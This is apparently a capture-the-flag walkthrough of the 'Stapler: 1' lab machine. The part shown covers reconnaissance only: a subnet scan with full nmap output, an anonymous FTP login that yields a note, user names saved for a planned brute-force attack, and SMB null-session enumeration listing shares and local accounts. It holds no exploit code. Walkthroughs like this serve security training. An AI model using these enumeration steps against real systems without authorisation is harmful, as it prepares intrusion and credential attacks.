Stapler: 1
Service discovery:
First, I fired up HaGashash in order to gain some information about which host to attack and what interesting services run there. (https://github.com/Gandosha/HaGashash).
[GandoPC ~]# go run go/src/github.com/Gandosha/HaGashash/main.go -project=Stapler -subnet=true -interface=enp0s3
<-=|HaGashash by Gandosha|=->
[+] nmap executable is in '/usr/bin/nmap'
[+] ifconfig executable is in '/usr/bin/ifconfig'
[!] Dependencies check is completed successfully.
[!] Starting to scan your subnet.
[+] Alive hosts in 192.168.43.0/24 are:
192.168.43.1
192.168.43.2
192.168.43.10
192.168.43.3
[+] Directory created at: /HaGashash_Projects/Stapler/192.168.43.1.
[!] Starting to scan 192.168.43.1 for TCP interesting stuff.
[!] Starting to scan 192.168.43.1 for UDP interesting stuff.
[+] Directory created at: /HaGashash_Projects/Stapler/192.168.43.2.
[!] Starting to scan 192.168.43.2 for TCP interesting stuff.
[!] Starting to scan 192.168.43.2 for UDP interesting stuff.
[+] Directory created at: /HaGashash_Projects/Stapler/192.168.43.10.
[!] Starting to scan 192.168.43.10 for TCP interesting stuff.
[!] Starting to scan 192.168.43.10 for UDP interesting stuff.
[+] Directory created at: /HaGashash_Projects/Stapler/192.168.43.3.
[!] Starting to scan 192.168.43.3 for UDP interesting stuff.
[!] Starting to scan 192.168.43.3 for TCP interesting stuff.
[+] Nmap's TCP script scanning on 192.168.43.3 is completed successfully.
[+] Nmap's UDP script scanning on 192.168.43.3 is completed successfully.
[+] Nmap's TCP script scanning on 192.168.43.10 is completed successfully.
[+] Nmap's TCP script scanning on 192.168.43.1 is completed successfully.
[+] Nmap's TCP script scanning on 192.168.43.2 is completed successfully.
[+] Nmap's UDP script scanning on 192.168.43.10 is completed successfully.
[+] Nmap's UDP script scanning on 192.168.43.1 is completed successfully.
[+] Nmap's UDP script scanning on 192.168.43.2 is completed successfully.
[+] Summary file for 192.168.43.10 is ready.
[+] Summary file for 192.168.43.1 is ready.
[+] Summary file for 192.168.43.3 is ready.
[+] Summary file for 192.168.43.2 is ready.
[gandosha@GandoPC ~]$ cat /HaGashash_Projects/Stapler/192.168.43.10/nmap_TCP_scan_output
# Nmap 7.70 scan initiated Tue Sep 25 13:16:02 2018 as: nmap -sS -p- -A -T4 -Pn -vv -oN /HaGashash_Projects/Stapler/192.168.43.10/nmap_TCP_scan_output 192.168.43.10
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.43.10
Host is up, received arp-response (0.0063s latency).
Scanned at 2018-09-25 13:16:04 IDT for 143s
Not shown: 65523 filtered ports
Reason: 65523 no-responses
PORT STATE SERVICE REASON VERSION
20/tcp closed ftp-data reset ttl 64
21/tcp open ftp syn-ack ttl 64 vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.43.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc/xrBbi5hixT2B19dQilbbrCaRllRyNhtJcOzE8x0BM1ow9I80RcU7DtajyqiXXEwHRavQdO+/cHZMyOiMFZG59OCuIouLRNoVO58C91gzDgDZ1fKH6BDg+FaSz+iYZbHg2lzaMPbRje6oqNamPR4QGISNUpxZeAsQTLIiPcRlb5agwurovTd3p0SXe0GknFhZwHHvAZWa2J6lHE2b9K5IsSsDzX2WHQ4vPb+1DzDHV0RTRVUGviFvUX1X5tVFvVZy0TTFc0minD75CYClxLrgc+wFLPcAmE2C030ER/Z+9umbhuhCnLkLN87hlzDSRDPwUjWr+sNA3+7vc/xuZul
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNQB5n5kAZPIyHb9lVx1aU0fyOXMPUblpmB8DRjnP8tVIafLIWh54wmTFVd3nCMr1n5IRWiFeX1weTBDSjjz0IY=
| 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ9wvrF4tkFMApswOmWKpTymFjkaiIoie4QD0RWOYnny
53/tcp open domain syn-ack ttl 64 dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http syn-ack ttl 64 PHP cli server 5.5 or later
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: 404 Not Found
123/tcp closed ntp reset ttl 64
137/tcp closed netbios-ns reset ttl 64
138/tcp closed netbios-dgm reset ttl 64
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom? syn-ack ttl 64
| fingerprint-strings:
| NULL:
| message2.jpgUT
| QWux
| "DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
3306/tcp open mysql syn-ack ttl 64 MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 7
| Capabilities flags: 63487
| Some Capabilities: Support41Auth, InteractiveClient, Speaks41ProtocolNew, SupportsLoadDataLocal, ODBCClient, SupportsCompression, SupportsTransactions, DontAllowDatabaseTableColumn, ConnectWithDatabase, LongPassword, IgnoreSigpipes, FoundRows, LongColumnFlag, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: :#x}t ]g\x14\x1A\x07OuH'S@){[
|_ Auth Plugin Name: 88
12380/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tim, we need to-do better next year for Initech
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.70%I=7%D=9/25%Time=5BAA0B42%P=x86_64-unknown-linux-gnu%
SF:r(NULL,1000,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0
SF:\0\x152\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x
SF:01\x04\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88
SF:A@\xa2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E
SF:\xa2\x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\
SF:x0f\xb2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7
SF:\xaeu\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x
SF:99\xd3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\x
SF:f8\xa0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xc
SF:e\[\x87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\
SF:x8b\xf4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\
SF:xe0\xdc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\x
SF:e4\xd5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\x
SF:f1\xaf\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1
SF:\xe2:\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\
SF:x1bk\x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9
SF:\xcc\xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1
SF:c\xfd\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3
SF:\xcc\x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|
SF:\xb0\xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\
SF:(\[r\xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5
SF:\xaak\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\
SF:x7fy\xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7
SF:f\x7f\xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82
SF:\xcb\[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\
SF:xf9\xcc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x
SF:8f\xa7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f
SF:\x81\xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0
SF:bI\x96\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb, NetBIOS MAC: (unknown)
| Names:
| RED<00> Flags:
| RED<03> Flags:
| RED<20> Flags:
| \x01\x02__MSBROWSE__\x02<01> Flags:
| WORKGROUP<00> Flags:
| WORKGROUP<1d> Flags:
| WORKGROUP<1e> Flags:
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 34093/tcp): CLEAN (Timeout)
| Check 2 (port 56485/tcp): CLEAN (Timeout)
| Check 3 (port 25126/udp): CLEAN (Timeout)
| Check 4 (port 2249/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED\x00
| Domain name: \x00
| FQDN: red
|_ System time: 2018-09-25T14:17:50+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-09-25 16:17:50
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 6.32 ms 192.168.43.10
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 25 13:18:27 2018 -- 1 IP address (1 host up) scanned in 146.83 seconds
Port 21 check:
Attempt to access FTP with anonymous creds (U:anonymous,P:anonymous):
[GandoPC 192.168.43.10]# ftp 192.168.43.10 Connected to 192.168.43.10. 220- 220-|-----------------------------------------------------------------------------------------| 220-| Harry, make sure to update the banner when you get a chance to show who has access here | 220-|-----------------------------------------------------------------------------------------| 220- 220 Name (192.168.43.10:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 107 Jun 03 2016 note 226 Directory send OK. ftp> get note 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note (107 bytes). 226 Transfer complete. 107 bytes received in 0.00887 seconds (11.8 kbytes/s) ftp> quit 221 Goodbye. [GandoPC 192.168.43.10]# cat note Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John. [GandoPC 192.168.43.10]# printf 'Elly\nJohn\n' > potential_users
Got some user names for future brute force attack. I always keep this option as a "last stand" if everything goes wrong.
Port 80 check:
Attempt to access via http port 80:
There's nothing here? I tried to use some power in order to discover some content:
NADA :(
Attempt to access via https port 80:
Nothing here too.
Port 139 check:
Attempt to enumerate some shares:
[GandoPC 192.168.43.10]# enum4linux 192.168.43.10 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Sep 25 14:16:33 2018 ========================== | Target Information | ========================== Target ........... 192.168.43.10 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ===================================================== | Enumerating Workgroup/Domain on 192.168.43.10 | ===================================================== [+] Got domain/workgroup name: WORKGROUP ============================================= | Nbtstat Information for 192.168.43.10 | ============================================= Looking up status of 192.168.43.10 RED <00> - H Workstation Service RED <03> - H Messenger Service RED <20> - H File Server Service ..__MSBROWSE__. <01> - H Master Browser WORKGROUP <00> - H Domain/Workgroup Name WORKGROUP <1d> - H Master Browser WORKGROUP <1e> - H Browser Service Elections MAC Address = 00-00-00-00-00-00 ====================================== | Session Check on 192.168.43.10 | ====================================== [+] Server 192.168.43.10 allows sessions using username '', password '' ============================================ | Getting domain SID for 192.168.43.10 | ============================================ Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ======================================= | OS information on 192.168.43.10 | ======================================= Use of uninitialized value $os_info in concatenation (.) or string at /usr/bin/enum4linux line 464. [+] Got OS info for 192.168.43.10 from smbclient: [+] Got OS info for 192.168.43.10 from srvinfo: RED Wk Sv PrQ Unx NT SNT red server (Samba, Ubuntu) platform_id : 500 os version : 6.1 server type : 0x809a03 ============================== | Users on 192.168.43.10 | ============================== Use of uninitialized value $users in print at /usr/bin/enum4linux line 874. Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 877. Use of uninitialized value $users in print at /usr/bin/enum4linux line 888. Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 890. ========================================== | Share Enumeration on 192.168.43.10 | ========================================== Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers kathy Disk Fred, What are we doing here? tmp Disk All temporary files should be stored here IPC$ IPC IPC Service (red server (Samba, Ubuntu)) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP RED [+] Attempting to map shares on 192.168.43.10 //192.168.43.10/print$ Mapping: DENIED, Listing: N/A //192.168.43.10/kathy Mapping: OK, Listing: OK //192.168.43.10/tmp Mapping: OK, Listing: OK //192.168.43.10/IPC$ [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* ===================================================== | Password Policy Information for 192.168.43.10 | ===================================================== [E] Dependent program "polenum.py" not present. Skipping this check. Download polenum from http://labs.portcullis.co.uk/application/polenum/ =============================== | Groups on 192.168.43.10 | =============================== [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: ======================================================================== | Users on 192.168.43.10 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================== [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-864226560-67800430-3082388513 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-5-21-864226560-67800430-3082388513 and logon username '', password '' S-1-5-21-864226560-67800430-3082388513-500 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-501 RED\nobody (Local User) S-1-5-21-864226560-67800430-3082388513-502 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-503 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-504 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-505 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-506 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-507 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-508 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-509 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-510 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-511 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-512 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-513 RED\None (Domain Group) S-1-5-21-864226560-67800430-3082388513-514 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-515 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-516 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-517 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-518 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-519 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-520 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-521 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-522 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-523 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-524 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-525 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-526 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-527 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-528 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-529 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-530 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-531 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-532 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-533 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-534 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-535 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-536 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-537 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-538 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-539 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-540 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-541 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-542 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-543 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-544 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-545 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-546 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-547 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-548 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-549 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-550 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1000 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1001 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1002 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1003 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1004 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1005 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1006 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1007 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1008 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1009 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1010 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1011 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1012 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1013 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1014 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1015 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1016 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1017 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1018 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1019 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1020 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1021 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1022 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1023 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1024 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1025 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1026 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1027 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1028 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1029 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1030 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1031 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1032 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1033 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1034 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1035 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1036 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1037 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1038 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1039 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1040 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1041 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1042 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1043 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1044 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1045 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1046 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1047 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1048 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1049 *unknown*\*unknown* (8) S-1-5-21-864226560-67800430-3082388513-1050 *unknown*\*unknown* (8) [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\peter (Local User) S-1-22-1-1001 Unix User\RNunemaker (Local User) S-1-22-1-1002 Unix User\ETollefson (Local User) S-1-22-1-1003 Unix User\DSwanger (Local User) S-1-22-1-1004 Unix User\AParnell (Local User) S-1-22-1-1005 Unix User\SHayslett (Local User) S-1-22-1-1006 Unix User\MBassin (Local User) S-1-22-1-1007 Unix User\JBare (Local User) S-1-22-1-1008 Unix User\LSolum (Local User) S-1-22-1-1009 Unix User\IChadwick (Local User) S-1-22-1-1010 Unix User\MFrei (Local User) S-1-22-1-1011 Unix User\SStroud (Local User) S-1-22-1-1012 Unix User\CCeaser (Local User) S-1-22-1-1013 Unix User\JKanode (Local User) S-1-22-1-1014 Unix User\CJoo (Local User) S-1-22-1-1015 Unix User\Eeth (Local User) S-1-22-1-1016 Unix User\LSolum2 (Local User) S-1-22-1-1017 Unix User\JLipps (Local User) S-1-22-1-1018 Unix User\jamie (Local User) S-1-22-1-1019 Unix User\Sam (Local User) S-1-22-1-1020 Unix User\Drew (Local User) S-1-22-1-1021 Unix User\jess (Local User) S-1-22-1-1022 Unix User\SHAY (Local User) S-1-22-1-1023 Unix User\Taylor (Local User) S-1-22-1-1024 Unix User\mel (Local User) S-1-22-1-1025 Unix User\kai (Local User) S-1-22-1-1026 Unix User\zoe (Local User) S-1-22-1-1027 Unix User\NATHAN (Local User) S-1-22-1-1028 Unix User\www (Local User) S-1-22-1-1029 Unix User\elly (Local User) [+] Enumerating users using SID S-1-5-32 and logon username '', password '' S-1-5-32-500 *unknown*\*unknown* (8) S-1-5-32-501 *unknown*\*unknown* (8) S-1-5-32-502 *unknown*\*unknown* (8) S-1-5-32-503 *unknown*\*unknown* (8) S-1-5-32-504 *unknown*\*unknown* (8) S-1-5-32-505 *unknown*\*unknown* (8) S-1-5-32-506 *unknown*\*unknown* (8) S-1-5-32-507 *unknown*\*unknown* (8) S-1-5-32-508 *unknown*\*unknown* (8) S-1-5-32-509 *unknown*\*unknown* (8) S-1-5-32-510 *unknown*\*unknown* (8) S-1-5-32-511 *unknown*\*unknown* (8) S-1-5-32-512 *unknown*\*unknown* (8) S-1-5-32-513 *unknown*\*unknown* (8) S-1-5-32-514 *unknown*\*unknown* (8) S-1-5-32-515 *unknown*\*unknown* (8) S-1-5-32-516 *unknown*\*unknown* (8) S-1-5-32-517 *unknown*\*unknown* (8) S-1-5-32-518 *unknown*\*unknown* (8) S-1-5-32-519 *unknown*\*unknown* (8) S-1-5-32-520 *unknown*\*unknown* (8) S-1-5-32-521 *unknown*\*unknown* (8) S-1-5-32-522 *unknown*\*unknown* (8) S-1-5-32-523 *unknown*\*unknown* (8) S-1-5-32-524 *unknown*\*unknown* (8) S-1-5-32-525 *unknown*\*unknown* (8) S-1-5-32-526 *unknown*\*unknown* (8) S-1-5-32-527 *unknown*\*unknown* (8) S-1-5-32-528 *unknown*\*unknown* (8) S-1-5-32-529 *unknown*\*unknown* (8) S-1-5-32-530 *unknown*\*unknown* (8) S-1-5-32-531 *unknown*\*unknown* (8) S-1-5-32-532 *unknown*\*unknown* (8) S-1-5-32-533 *unknown*\*unknown* (8) S-1-5-32-534 *unknown*\*unknown* (8) S-1-5-32-535 *unknown*\*unknown* (8) S-1-5-32-536 *unknown*\*unknown* (8) S-1-5-32-537 *unknown*\*unknown* (8) S-1-5-32-538 *unknown*\*unknown* (8) S-1-5-32-539 *unknown*\*unknown* (8) S-1-5-32-540 *unknown*\*unknown* (8) S-1-5-32-541 *unknown*\*unknown* (8) S-1-5-32-542 *unknown*\*unknown* (8) S-1-5-32-543 *unknown*\*unknown* (8) S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) S-1-5-32-1000 *unknown*\*unknown* (8) S-1-5-32-1001 *unknown*\*unknown* (8) S-1-5-32-1002 *unknown*\*unknown* (8) S-1-5-32-1003 *unknown*\*unknown* (8) S-1-5-32-1004 *unknown*\*unknown* (8) S-1-5-32-1005 *unknown*\*unknown* (8) S-1-5-32-1006 *unknown*\*unknown* (8) S-1-5-32-1007 *unknown*\*unknown* (8) S-1-5-32-1008 *unknown*\*unknown* (8) S-1-5-32-1009 *unknown*\*unknown* (8) S-1-5-32-1010 *unknown*\*unknown* (8) S-1-5-32-1011 *unknown*\*unknown* (8) S-1-5-32-1012 *unknown*\*unknown* (8) S-1-5-32-1013 *unknown*\*unknown* (8) S-1-5-32-1014 *unknown*\*unknown* (8) S-1-5-32-1015 *unknown*\*unknown* (8) S-1-5-32-1016 *unknown*\*unknown* (8) S-1-5-32-1017 *unknown*\*unknown* (8) S-1-5-32-1018 *unknown*\*unknown* (8) S-1-5-32-1019 *unknown*\*unknown* (8) S-1-5-32-1020 *unknown*\*unknown* (8) S-1-5-32-1021 *unknown*\*unknown* (8) S-1-5-32-1022 *unknown*\*unknown* (8) S-1-5-32-1023 *unknown*\*unknown* (8) S-1-5-32-1024 *unknown*\*unknown* (8) S-1-5-32-1025 *unknown*\*unknown* (8) S-1-5-32-1026 *unknown*\*unknown* (8) S-1-5-32-1027 *unknown*\*unknown* (8) S-1-5-32-1028 *unknown*\*unknown* (8) S-1-5-32-1029 *unknown*\*unknown* (8) 